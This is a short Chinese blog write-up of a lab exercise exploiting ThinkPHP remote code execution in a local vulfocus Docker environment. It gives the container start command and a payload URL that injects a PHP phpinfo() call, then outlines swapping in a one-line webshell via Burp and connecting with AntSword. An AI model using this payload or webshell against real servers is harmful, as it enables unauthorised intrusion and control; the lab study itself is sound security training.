thinkphp框架远程代码执行

凌晨五点的星2024-07-31 11:30

一、环境

vulfocus网上自行下载

启动命令:

复制代码 
 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

复制代码 
http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关推荐
pandarking3 小时前
[CTF]攻防世界:ez_curl
android·web安全·网络安全
上海云盾-小余10 小时前
WEB防火墙的主要防御功能有哪些
安全·web安全·网络安全·安全威胁分析·ddos
pandarking17 小时前
[CTF]攻防世界:Shrin(SSTI)
web安全
Z3r4y17 小时前
【代码审计】RuoYi-4.7.1&4.8.1 Thymeleaf模板注入分析
java·web安全·ruoyi·代码审计·thymeleaf
jenchoi41318 小时前
【2025-12-01】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
咨询QQ1808095120 小时前
探索COMSOL电晕放电现象:离子风生成与作用机制
web安全
-曾牛20 小时前
深入解析 XSS 漏洞:原理、分类与攻防实战
前端·安全·web安全·网络安全·渗透测试·xss·原理解析
pandarking21 小时前
[CTF]攻防世界:easytornado
web安全·ctf
知攻善防实验室1 天前
Yakit热加载 之 出差无聊测酒店 WiFi
安全·web安全·网络安全·渗透测试
上海云盾-小余1 天前
企业级Web安全加速方案:一体化防护DDoS/CC/爬虫攻击
爬虫·web安全·ddos
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06本地部署阿里最新开源的Z-Image07Linux下V2Ray安装配置指南08Labelme从安装到标注:零基础完整指南09【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连10Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽